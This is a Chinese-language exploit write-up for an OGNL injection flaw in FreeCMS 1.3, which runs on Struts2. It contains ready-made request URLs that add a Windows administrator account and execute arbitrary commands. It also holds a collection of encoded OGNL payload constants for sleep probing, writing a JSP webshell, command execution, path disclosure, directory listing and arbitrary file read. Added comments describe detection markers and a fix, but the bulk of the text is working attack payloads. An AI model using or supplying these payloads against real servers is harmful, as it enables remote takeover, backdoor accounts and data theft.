开源免费java CMS - FreeCMS1.3-数据对象-mail 

项目地址:https://code.google.com/p/freecms/

提交的 action (请求路径):

:8080/ff/login_login.do?user.loginname=EXP


FreeCMS 命令执行 (OGNL 执行顺序绕过漏洞)


FreeCMS 命令执行 (OGNL 执行顺序绕过漏洞)



 

添加帐号:

:8080/ff/login_login.do?user.loginname=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec('net%20user%20admin%20admin%20/add%27%29%29%28meh%29&z[%28user.loginname%29%28%27meh%27%29]=true


 

执行命令:


:8080/ff/login_login.do?user.loginname=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=%20new%20java.lang.Boolean(false),%23_memberAccess[%22allowStaticMethodAccess%22]=new%20java.lang.Boolean(true),%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))&z[(user.loginname)('meh')]=true&cmd=cmd%20/c%20set


FreeCMS 命令执行 (OGNL 执行顺序绕过漏洞)


 

其他 EXP 片段:

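// Struts2 OGNL-injection request fragments collected in the FreeCMS 1.3 write-up above.
//
// Layout repair: the declarations had been collapsed onto a few physical lines, which put
// `var TEST_SLEEP_EXP_2` inside the trailing `//Exp1` comment and left `TEST_EXECUTE_CMD_EXP2`
// without a terminating `;` before the next `var`. They are restored to one declaration per
// line; every string literal is unchanged.
//
// Defender notes (what these fragments have in common, not how to use them):
//  * Each fragment carries the same two markers — `_memberAccess` / `allowStaticMethodAccess`
//    and `xwork.MethodAccessor.denyMethodExecution` — either raw, octal-escaped (`\43` = `#`,
//    `\75` = `=`, `\40` = space), `\u00xx`-escaped or percent-encoded. A WAF or log-search rule
//    should match on the decoded form of both parameter NAMES and values, since several of the
//    fragments put the expression in the parameter name.
//  * FreeCMS appears to be affected through the Struts2 build it bundles (not visible on this
//    page); the remediation is on the Struts2 side — a version whose parameter interceptor
//    rejects non-alphanumeric parameter names and whose OGNL member access denies static
//    method calls — rather than anything in FreeCMS's own code.
//  * `fd_list`, `dname`, `fname` and `bsize` below look like template placeholders filled in
//    by the (unseen) caller — TODO confirm against the script that consumes these constants.

// Exp1 — presence probe: the only effect is a 5 s Thread.sleep, i.e. a time-based check.
var TEST_SLEEP_EXP = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep([5000])')(d))";

// Exp2 — the same sleep probe in the `'+( … )+'` expression-string form (percent-encoded `+`).
var TEST_SLEEP_EXP_2 = "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Thread@sleep([5000]))%2b'";

// Exp3 — the same sleep probe in the `(…)(meh)&z[(foo)('meh')]=true` form used by the URLs above.
var TEST_SLEEP_EXP_3 = "%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,@java.lang.Thread@sleep([5000]))(meh%29&z[%28foo%29%28%27meh%27%29]=true";

// Writes the contents of request parameter `t` to `system.jsp` in the web root via
// FileOutputStream and echoes the real path. On-disk indicator: a new .jsp under the web root
// that the deployment did not ship.
var TEST_UPLOAD_SHELL = "('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i12)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i13)(('\\43xman.getWriter().println(\\43req.getServletContext().getRealPath(%22\\u005c%22))')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(new\\40java.lang.StringBuilder(\\43req.getRealPath(%22\\u005c%22)).append(@java.io.File@separator).append(%22system.jsp%22).toString())')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=";

// Runs the `cmd` parameter through Runtime.exec and returns the first 100 bytes of its stdout
// in the response body. (The `(i2)` stanza is duplicated in the original; kept verbatim.)
var TEST_EXECUTE_CMD_EXP = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\\43webRootzpro\\75@java.lang.Runtime@getRuntime().exec(\\43req.getParameter(%22cmd%22))')(d))&(i)(('\\43webRootzproreader\\75new\\40java.io.DataInputStream(\\43webRootzpro.getInputStream())')(d))&(i01)(('\\43webStr\\75new\\40byte[[100]]')(d))&(i1)(('\\43webRootzproreader.readFully(\\43webStr)')(d))&(i111)(('\\43webStr12\\75new\\40java.lang.String(\\43webStr)')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43webStr12)')(d))&(i99)(('\\43xman.getWriter().close()')(d))&cmd=cmd%20/c%20";

// Same as TEST_EXECUTE_CMD_EXP in the expression-string form.
var TEST_EXECUTE_CMD_EXP2 = "'%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[[100]],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%23result))%2b'&cmd=cmd%20/c%20";

// Prints the web root's real path into the response (information disclosure only).
var TEST_GET_WEB_PATH = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43req.getRealPath(%22\\u005c%22))')(d))&(i99)(('\\43xman.getWriter().close()')(d))";

// Same as TEST_GET_WEB_PATH in the expression-string form.
var TEST_GET_WEB_PATH2 = "'%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.struts2.ServletActionContext@getResponse().getWriter().println(@org.apache.struts2.ServletActionContext@getRequest().getRealPath(%22/%22)))%2b'";

// Filesystem enumeration: prints File.listRoots()[fd_list] into the response.
var TEST_FILES_LIST = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(@java.io.File@listRoots()[fd_list])')(d))&(i99)(('\\43xman.getWriter().close()')(d))";

// Earlier variant of TEST_FILES_LIST that the author left commented out (hard-coded root/file
// indices, also reports isDirectory()). Kept disabled, as in the original.
// var TEST_FILES_LIST = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('\\43files\\75new\\40java.lang.StringBuilder(@java.io.File@listRoots()[4].listFiles()[0]).append(%22[isDirectory]%22).append(@java.io.File@listRoots()[4].listFiles()[0].isDirectory())')(d))&(i95)(('\\43xman.getWriter().println(\\43files)')(d))&(i99)(('\\43xman.getWriter().close()')(d))";

// Arbitrary file read: streams listRoots()[dname].listFiles()[fname] into the response as a
// 4-byte length (DataOutputStream.writeInt) followed by up to `bsize` bytes of content.
var TEST_GET_FILE_CONTENT = "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i1)(('\\43dis\\75new\\40java.io.DataInputStream(new\\40java.io.FileInputStream(@java.io.File@listRoots()[[dname]].listFiles()[fname]))')(d))&(i2)(('\\43dos\\75new\\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\\43buff\\75new\\40byte[[bsize]]')(d))&(i4)(('\\43dis.skipBytes(0)')(d))&(i5)(('\\43size\\75\\43dis.read(\\43buff)')(d))&(i6)(('\\43dis.close()')(d))&(i7)(('\\43dos.writeInt(\\43size)')(d))&(i95)(('\\43dos.write(\\43buff\\u002c0\\u002c\\43size)')(d))&(i99)(('\\43dos.close()')(d))";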